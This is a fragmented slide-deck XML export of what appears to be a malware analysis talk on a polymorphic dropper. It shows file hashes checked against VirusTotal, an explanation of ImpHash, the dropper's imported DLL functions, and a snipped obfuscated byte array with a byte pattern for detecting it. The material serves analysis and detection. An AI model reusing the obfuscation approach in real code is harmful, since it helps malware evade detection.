              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="852"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>my_f_dropper()</a:t>
            </a:r>
            <a:endParaRPr sz="1495">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82" name="Shape 282"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;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does the output look like?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;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285" name="Google Shape;285;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311705" y="1152480"/>
            <a:ext cx="8435725" cy="30614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89" name="Shape 289"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;290;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 I ran it a few more times</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;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File#2:  55F708DD57AD1586C8D26E658FD2FD33EEEB9466E2B110089F0733E9F0349F41 – Not found in VirusTotal</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File#3:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F9E1D72F07E33068A1B5EC9FF2D1F2D1BF33E154C12B231335EC7E0AFB1A17EE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Not found in VirusTotal</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File#4:  79C595E42F4C6D00B02E45359C12B52AA7238DF24B4BC308FE1BD60EE6AC1710 – Not found in VirusTotal</a:t>
            </a:r>
            <a:endParaRPr>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95" name="Shape 295"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;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about ImpHash?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Google Shape;297;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298" name="Google Shape;298;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152479"/>
            <a:ext cx="8520601" cy="3195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Skip to the end - the Polymorphism</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sha256 of dropped files:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>77E706F98B1E4FE48A4A1631B27529DC587AEAB2D187322439D3B5A726DA2F80 - VirusTotal knows this hash</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55F708DD57AD1586C8D26E658FD2FD33EEEB9466E2B110089F0733E9F0349F41 - not known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F9E1D72F07E33068A1B5EC9FF2D1F2D1BF33E154C12B231335EC7E0AFB1A17EE - not known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79C595E42F4C6D00B02E45359C12B52AA7238DF24B4BC308FE1BD60EE6AC1710 - not known</a:t>
            </a:r>
            <a:endParaRPr>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302" name="Shape 302"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Google Shape;303;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MalwareBazaar knows that ImpHash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Google Shape;304;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305" name="Google Shape;305;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1226945"/>
            <a:ext cx="9144001" cy="391656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309" name="Shape 309"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;310;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Sidebar #5 - wtf is ImpHash?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="Google Shape;311;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Mandiant has an excellent explanation of imphash and how to use it here:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.mandiant.com/resources/tracking-malware-import-hashing</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One unique way that Mandiant tracks specific threat groups' backdoors is to track portable executable (PE) imports. Imports are the functions that a piece of software (in this case, the backdoor) calls from other files (typically various DLLs that provide functionality to the Windows operating system). To track these imports, Mandiant creates a hash based on library/API names and their specific order within the executable. We refer to this convention as an "imphash" (for "import hash").</a:t>
            </a:r>
            <a:endParaRPr>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315" name="Shape 315"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Google Shape;316;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Sidebar #5 - What is an Import?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354575"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 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="318" name="Google Shape;318;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8563475" cy="2987637"/>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322" name="Shape 322"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;323;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Sidebar #5 - What does it import?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;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325" name="Google Shape;325;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152482"/>
            <a:ext cx="8370675" cy="31578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329" name="Shape 329"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Google Shape;330;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Sidebar #5 - what is the "connect" function?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Google Shape;331;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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Connect to server.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    iResult = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>connect(ConnectSocket, (SOCKADDR *) &amp; clientService, sizeof (clientService))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    if (iResult == SOCKET_ERROR) {</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        wprintf(L"connect function failed with error: %ld\n", WSAGetLastError());</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        iResult = closesocket(ConnectSocket);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        if (iResult == SOCKET_ERROR)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            wprintf(L"closesocket function failed with error: %ld\n", WSAGetLastError());</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        WSACleanup();</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        return 1;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr>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335" name="Shape 335"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;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Sidebar #5 - Conclusions on Imports and ImpHash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;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108 Imported functions - should be a good enough sample size to give us a fairly unique ImpHash (Think of the ImpHash of a file that had 0 imports)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4 DLLs imported: kernel32.dll, user32.dll, ws2_32.dll, comctl32.dll</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Interesting imports include:</a:t>
            </a:r>
            <a:endParaRPr>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connect from ws2_32.dll</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WriteFile, CreateFileW, CreateFileA from kernel32.dll</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LoadLibraryExW from kernel32.dll</a:t>
            </a:r>
            <a:endParaRPr sz="1600">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We can guess that the dropped file will:</a:t>
            </a:r>
            <a:endParaRPr>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Write a new file to disk</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Run a DLL</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Create a network connection</a:t>
            </a:r>
            <a:endParaRPr sz="1600">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341" name="Shape 341"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Google Shape;342;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 what's different in the 4 files?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Google Shape;343;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rPr>
              <a:t>We have 4 files with 4 different file hashes, can we find what's different?</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Yes, absolutely – we could figure out the regex for 4 random values between 0x02 and 0x09…</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Or we could look for the static values around our 4 random values</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remember this bit of code?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a: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xaCQ = Array(15,8,138,201,20,22,190,76,259,&lt;&lt;&lt;snipped&gt;&gt;&gt;,73,136,201,</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77,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F6B26B"/>
                </a:highlight>
              </a:rPr>
              <a:t>262,262,262,242,10,146,92</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>999999,999999,999999,999999,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7,146,76,</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255,145,223,</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>—------------------</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can search for the orange highlighted stuff:  </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xFF, 0xFF, 0xFF, 0xEB, 0x03, 0x8B, 0x55</a:t>
            </a:r>
            <a:endParaRPr>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347" name="Shape 347"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Google Shape;348;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4 Random Values</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Google Shape;349;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350" name="Google Shape;350;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311688" y="1152475"/>
            <a:ext cx="4791075" cy="1352550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
